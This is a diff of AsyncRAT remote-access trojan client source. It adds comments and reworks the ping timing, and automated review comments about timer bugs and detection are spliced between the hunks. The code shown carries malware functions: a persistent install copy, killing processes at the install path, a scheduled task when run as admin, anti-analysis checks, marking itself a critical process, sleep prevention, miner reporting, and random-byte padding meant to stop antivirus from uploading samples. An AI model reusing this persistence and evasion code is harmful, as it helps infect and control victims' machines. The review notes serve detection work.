diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
index 560549e..0b8af18 100644
--- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
@@ -22,17 +22,19 @@ namespace Client.Connection
 {
 public static class ClientSocket
 {
- public static Socket TcpClient { get; set; }
- public static SslStream SslClient { get; set; }
- private static byte[] Buffer { get; set; }
- private static long Buffersize { get; set; }
- private static Timer Tick { get; set; }
- private static MemoryStream MS { get; set; }
- public static bool IsConnected { get; set; }
- private static object SendSync { get; } = new object();
- public static Stopwatch Pong { get; set; }
+ public static Socket TcpClient { get; set; } //Main socket
+ public static SslStream SslClient { get; set; } //Main SSLstream
+ private static byte[] Buffer { get; set; } //Socket buffer
+ private static long Buffersize { get; set; } //Recevied size
+ private static Timer KeepAlive { get; set; } //Send Performance
+ private static MemoryStream MS { get; set; } //Socket MS
+ public static bool IsConnected { get; set; } //Check socket status
+ private static object SendSync { get; } = new object(); //Sync send
+ private static Timer Ping { get; set; } //Send ping interval
+ public static int Interval { get; set; } //ping value
 
- public static void InitializeClient()
+
+ public static void InitializeClient() //Connect & reconnect
 {
 try
 {
@@ -90,8 +92,7 @@ namespace Client.Connection
 Buffer = new byte[4];
 MS = new MemoryStream();
 Send(IdSender.SendInfo());
- Tick = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
- Pong = new Stopwatch();
+ KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
 SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
 }
 else
@@ -126,7 +127,7 @@ namespace Client.Connection
 
 try
 {
- Tick?.Dispose();
+ KeepAlive?.Dispose();
 SslClient?.Dispose();
 TcpClient?.Dispose();
 MS?.Dispose();
@@ -134,7 +135,7 @@ namespace Client.Connection
 catch { }
 }
 
- public static void ReadServertData(IAsyncResult ar)
+ public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
 {
 try
 {
@@ -243,9 +244,15 @@ namespace Client.Connection
 msgpack.ForcePathObject("Packet").AsString = "Ping";
 msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)IdSender.TheCPUCounter.NextValue()}% RAM {(int)IdSender.TheMemCounter.NextValue()}%";
 Send(msgpack.Encode2Bytes());
- Pong.Reset();
- Pong.Start();
+ Ping?.Dispose();
+ Interval = 0;
+ Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
 GC.Collect();
 }
+
+ private static void Pong(object obj)
+ {
+ Interval++;
+ }
 }
 }
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index ae91776..18a8aad 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -4,12 +4,8 @@ using Client.MessagePack;
 using Client.Connection;
 using System;
 using System.Diagnostics;
-using System.IO;
-using System.Net.Sockets;
 using System.Reflection;
-using System.Text;
 using System.Threading;
-using System.Windows.Forms;
 using System.Collections.Generic;
 using Microsoft.VisualBasic;
 
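Review bot: In the `@@ -243,9 +244,15 @@` hunk of ClientSocket.cs, nothing documents that `Interval` is a callback count rather than a time: `Pong` runs on a `System.Threading.Timer` with a 1 ms period and only does `Interval++`, and on Windows a 1 ms period is normally coarsened to the system timer resolution, so the integer later sent in the "pong" packet is not the elapsed milliseconds the removed `Stopwatch` reported. The increment is a plain read-modify-write in a timer callback while Packet.cs reads the property, presumably on another thread, and the visible cleanup lines in the `@@ -126,7 +127,7 @@` hunk dispose `KeepAlive` but not `Ping`, so the timer appears to keep firing after a disconnect. For anyone decoding this traffic the property comment should say what the number is, e.g. `//callbacks counted since the last Ping packet, not wall-clock ms`. The enclosing method starts outside the hunk.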
@@ -25,12 +21,12 @@ namespace Client.Handle_Packet
 unpack_msgpack.DecodeFromBytes((byte[])data);
 switch (unpack_msgpack.ForcePathObject("Packet").AsString)
 {
- case "pong":
+ case "pong": //send interval value to server
 {
- ClientSocket.Pong.Stop();
+ int interval = (int)ClientSocket.Interval;
 MsgPack msgPack = new MsgPack();
 msgPack.ForcePathObject("Packet").SetAsString("pong");
- msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Pong.ElapsedMilliseconds);
+ msgPack.ForcePathObject("Message").SetAsInteger(interval);
 ClientSocket.Send(msgPack.Encode2Bytes());
 break;
 }
@@ -80,7 +76,7 @@ namespace Client.Handle_Packet
 }
 }
 
- private static void Received()
+ private static void Received() //reset client forecolor
 {
 MsgPack msgpack = new MsgPack();
 msgpack.ForcePathObject("Packet").AsString = "Received";
@@ -88,7 +84,7 @@ namespace Client.Handle_Packet
 Thread.Sleep(1000);
 }
 
- public static void Error(string ex)
+ public static void Error(string ex) //send to logs
 {
 MsgPack msgpack = new MsgPack();
 msgpack.ForcePathObject("Packet").AsString = "Error";
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
index 47e6676..ec037b9 100644
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -16,7 +16,7 @@ namespace Client.Install
 try
 {
 FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
- if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName)
+ if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) //check if payload is running from installation path
 {
 
 for (int i = 0; i < 10; i++)
@@ -24,7 +24,7 @@ namespace Client.Install
 Thread.Sleep(1000);
 }
 
- foreach (Process P in Process.GetProcesses())
+ foreach (Process P in Process.GetProcesses()) //kill any process which shares same path
 {
 try
 {
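Review bot: In the `case "pong"` hunk of Packet.cs, `int interval = (int)ClientSocket.Interval;` casts an `int` to `int`, since the same commit declares the property as `public static int Interval` in ClientSocket.cs; the cast reads as if a narrowing from the old `long` were still taking place. The argument handed to `SetAsInteger` does change type, from the `long` of `Stopwatch.ElapsedMilliseconds` to `int`, and whether that alters the encoded width of the "Message" field depends on `SetAsInteger`, which is not shown, so a decoder or network signature written for the "pong" packet should be checked against a fresh capture. The added comment would be more accurate as `//reply with the count accumulated since the last Ping packet`. The enclosing switch starts and ends outside the hunk.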
@@ -33,7 +33,7 @@ namespace Client.Install
 }
 catch { }
 }
- if (Methods.IsAdmin())
+ if (Methods.IsAdmin()) //if payload is runnign as administrator install schtasks
 {
 Process proc = new Process
 {
@@ -64,6 +64,8 @@ namespace Client.Install
 fs = new FileStream(installPath.FullName, FileMode.CreateNew);
 byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
 fs.Write(clientExe, 0, clientExe.Length);
+
+ //prevent AV from sending sample by increasing the payload size
 byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
 new Random().NextBytes(junk);
 fs.Write(junk, 0, junk.Length);
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index d2d6e5f..b7ed309 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -23,25 +23,25 @@ namespace Client
 
 try
 {
- if (!MutexControl.CreateMutex())
+ if (!MutexControl.CreateMutex()) //if current payload is a duplicate
 Environment.Exit(0);
 
- if (Convert.ToBoolean(Settings.Anti))
+ if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment
 Anti_Analysis.RunAntiAnalysis();
 
- if (Convert.ToBoolean(Settings.Install))
+ if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence]
 NormalStartup.Install();
 
- if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
+ if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process
 ProcessCritical.Set();
 
- Methods.PreventSleep();
+ Methods.PreventSleep(); //prevent pc to idle\sleep
 
- new CheckMiner().GetProcess();
+ new CheckMiner().GetProcess(); //check miner status
 }
 catch { }
 
- while (true)
+ while (true) // ~ loop to check socket status
 {
 if (!ClientSocket.IsConnected)
 {
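Review bot: The comment added in the `@@ -64,6 +64,8 @@` hunk of NormalStartup.cs gives the motive but not the on-disk result, which is what a reader triaging a host needs. From the unchanged lines beside it, the installed copy is the original executable followed by between `40 * 1024 * 1000` and `50 * 1024 * 1000` random bytes, so the file is the same image with a large high-entropy tail and its whole-file hash differs on every install. I would word the comment `//append about 40-50 MB of random bytes after the copied executable; whole-file hash changes per install`. For detection this means matching on the executable portion, or on an oversized random tail after the image, rather than on a file hash. The surrounding method starts and ends outside the hunk.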
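Review bot: Two of the comments added in the Program.cs hunk are too loose to tell a reader what the guarded call does: `//run anti-virtual environment` and `//active critical process`. Going only by the names visible here, clearer wording would be `//run the analysis-environment checks when Settings.Anti is set` and `//mark this process as critical when Settings.BDOS is set and running as admin`. The bodies of `Anti_Analysis.RunAntiAnalysis` and `ProcessCritical.Set` are not in this diff, so that reading is inferred; if the second does what its name suggests, responders should expect that terminating the process can crash the host. Each comment also sits between an `if` and its unbraced one-line body, which makes the guarded statement easy to misread. The enclosing method starts outside the hunk and the `while` body continues past it.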